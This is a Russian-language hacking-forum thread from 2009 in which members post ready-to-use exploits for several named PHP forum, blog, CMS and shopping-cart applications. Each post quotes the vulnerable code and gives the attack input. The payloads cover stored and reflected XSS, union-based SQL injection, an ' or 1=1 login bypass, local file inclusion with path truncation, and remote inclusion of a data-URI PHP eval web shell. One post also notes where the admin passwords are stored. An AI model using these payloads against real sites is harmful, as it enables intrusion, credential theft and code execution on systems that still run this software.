HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.11.2009, 23:57
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами: 8700497

Репутация: 388
По умолчанию

BMForum 5.6
Активная xss:

/messenger.php?job=write
в модуле личных сообщений.
В поле "Содержание" пишем:
Цитата:
"><script>alert()</script>
и отправляем.
Активная xss:

/post.php?forumid=[number_forum]
при создании нового Топика.
В поле "Заголовок" пишем:
Цитата:
"><script>alert()</script>
и добавляем. Так же работает в поле "Описание".
Активная xss:

/profile.php
в Профиле. В полях:
-Номер MSN
-Подпись
-Домашняя страница
-Информация о себе
пишем
Цитата:
"><script>alert()</script>
. Будет видно при просмотре Тем с вашими сообщениями и у вас в профиле.
Пассивная xss:

http://localhost/plugins.php?p=tags&jinhua=&listby=&tagname=[tag]&forumid=[id]&page=%22%3E%3Cscript%3Ealert()%3C/script%3E
Так же в наличии несколько sql - инъекций, но на форуме их уже выкладывали.

Последний раз редактировалось Bb0y; 18.11.2009 в 14:40.. Причина: Поправка
 
Ответить с цитированием

PHPMySpace Gold Edition 8.0
  #2  
Старый 18.11.2009, 18:26
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию PHPMySpace Gold Edition 8.0

PHPMySpace Gold Edition 8.0

From ROA with Love

Пассивная XSS
/modules/ecal/display.php?day=1&month=11&year=<script>alert();</script>
/modules/memberslist/index.php?letter=All&sortby=name&orderby=ASC&query ='><script>alert();</script>

Раскрытие путей
/modules/xtremuserguestbook/sign.php?gbid[]=1
/modules/ecal/display.php?day=1&month[]=11
 
Ответить с цитированием

  #3  
Старый 18.11.2009, 21:53
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

2z Project

Активная XSS
В комментариях к новости:
Цитата:
[img=javascript:alert()][/img]
Раскрытие путей
Цитата:
/?action=search&author=&catid=0&postdate=&search[]=12
 
Ответить с цитированием

  #4  
Старый 19.11.2009, 16:14
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами: 9285506

Репутация: 1463
По умолчанию

FreeBlog 0.2
http://sourceforge.net/projects/freeblog
SQL

afficher_commentaire.php
PHP код:
if (isset($_GET['id']))
{
$id $_GET['id'];
$query="SELECT * FROM commentaires WHERE id_article='$id' && approuve=1 order by id DESC"
mq=off
http://localhost/FreeBlog/afficher_commentaire.php?id=1'+union+select+1,2,ve rsion(),4,5,6,user(),8+--+
 
Ответить с цитированием

  #5  
Старый 19.11.2009, 20:35
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами: 9285506

Репутация: 1463
По умолчанию

wellyblog-version-0.8.1
sourceforge.net/projects/wellyblog/
Обход авторизации

password.php
PHP код:
$email $_POST['email'];
$tempsql="select username, password from tbluser where email='".$email."'";

$rspass=mysql_query($tempsql);
$num_rows=mysql_num_rows($rspass);
if(
$num_rows>0){
$decryptedpass=decrypt(mysql_result($rspass0"password"), mysql_result($rspass0"username")); 
mq=off
$_POST['email']=bla@bla.com' or 1=1 limit 0,1 --
 
Ответить с цитированием

  #6  
Старый 20.11.2009, 00:36
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами: 9285506

Репутация: 1463
По умолчанию

profitCode Shopping Cart
Release Date:2009-04-11
http://sourceforge.net/projects/profbiz-cart/
http://profbiz-cart.sourceforge.net/

LFI

cart.php
PHP код:
global $chckoutaction$payMethod$donecart$itemcount$thmbImgsize$ckprvd;
include 
"mainincs/cartfunctions.php";
if(
$ckprvd) {
include (
"checkouts/checkout_" $ckprvd ".php"); 
в checkouts/ есть файл checkout_cod.php, достраиваем констукцию до него

можно инклудить файлы .php
http://localhost/store/cart.php?ckprvd=cod.php/../../leftmenu

NULL-byte слешируется, поэтому для иклуда произвольного файла используем Альтернативу от Raz0r,
в моем случае это 270 точек (Windows)
Код HTML:
http://localhost/store/cart.php?ckprvd=cod.php/../../../../../../../boot.ini..............................................................................................................................................................................................................................................................................
RFI

index.php
PHP код:
else if($proMod) {
include 
"$proMod".php"
http://localhost/store/index.php?proMod=data:,%3C?php%20eval($_REQUEST[cmd]);%20?%3E&cmd=phpinfo();

Пароли администратора и к базе хранятся в adminshop/config/shopSettings.php
 
Ответить с цитированием

  #7  
Старый 20.11.2009, 01:22
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию

PIXE CMS VERSION 1.02

Ну вот наконец то вырвался я из бана

Уязвимость присутствует в скрипте index.php (и не только):

Уязвимый код:

PHP код:
...
include 
"admin/lang/".$language.".php";    
... 
Эксплатация:

Код:
http://localhost/22/index.php?language=../../../../FILE%00
Для эксплатации понадобится register_globals = ON
 
Ответить с цитированием

  #8  
Старый 21.11.2009, 02:06
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Product: WEngine
Version: 1.0
Author: http://hot.ee

SQL-inj

file: /modules/news/index.php
PHP код:
$read $_GET['read'];
    
$newssql "select * from news where news_id = '$read'";
    
$newsresult mysql_query($newssql);
    
$newsrow mysql_fetch_array($newsresult); 
target: ?read=1'+union+select+1,2,3,version()/*

file:
user.php
PHP код:
$login $_POST['login'];
    
$password $_POST['password'];
    
$email $_POST['email'];
    
$entersql "SELECT * FROM users WHERE user_name = '$login'";
    
$enterresult mysql_query($entersql);
...
$entersql "SELECT user_password FROM users WHERE user_name =  '$login'"
Передача идет методом POST.
target: ?login=user'+union+select+1,2,3,4,5/*

file: mail.php
PHP код:
$send $_GET['sendid'];
    
$mail $_GET['mail'];
    if(
$mail == ""):
        print(
"Вы не ввели email!");
        exit;
    endif;
    
$newssql "select * from news where news_id = '$send'"
target: ?send=1'+union+select+1,version(),database(),4/*
Sql-inj не совсем обычная,вывод будет у вас на E-mail,так что его нужно вводить рабочий.

file: print.php
PHP код:
$print $_GET['print'];
    
$newssql "select * from news where news_id = '$print'";
    
$newsresult mysql_query($newssql);
    
$newsrow mysql_fetch_array($newsresult);
    
printf("<b>%s</b><hr>"$newsrow['news_name']); 
target: ?print=1'+union+select+1,version(),3,4/*

Так-же уязвимы еще некоторые файлы,но выкладывать это не вижу смысла,так как все скули однотипные.Для некоторых уязвимостей,необходимо MQ = off дабы кавычки пролетали свободно.

Последний раз редактировалось m0Hze; 21.11.2009 в 09:29..
 
Ответить с цитированием

  #9  
Старый 21.11.2009, 03:01
Twin $park
Новичок
Регистрация: 15.11.2009
Сообщений: 8
С нами: 8677322

Репутация: 79
По умолчанию

PyLucid CMS

Passive XSS

Цитата:
/_command/19/RSSfeedGenerator/download/RSS.xml?count=>>''<script>alert(xss)</script
здесь же и раскрыте путей

Цитата:
/_command/19/RSSfeedGenerator/download/RSS.xml?count=
(с) Twin $park

Последний раз редактировалось Twin $park; 01.01.2010 в 22:45..
 
Ответить с цитированием

  #10  
Старый 21.11.2009, 12:51
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Product: Mini-CWB CMS
Author: GraFX Software Solutions (GPL)
Version: 2.1.1

LFI

file: all (!)

PHP код:
if (!isset($_SESSION['session_lang']))
    {
        
$session_lang $LANG;
        
$_SESSION['session_lang']=$session_lang;
    }
    else
         
$session_lang=$_SESSION['session_lang'];
    include_once(
INDEX_PATH."cls_fast_template.php");
    
$NEWLANG $session_lang;
    include_once(
INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php"); // а вот и инклуд. 
target: Создаем запрос,где подменяем параметр сесии с названием session_lang на запрос инклуда файла.Пример: session_lang=file.php%00
MQ=off, ../ не фильтруеться.

Последний раз редактировалось m0Hze; 21.11.2009 в 14:01..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.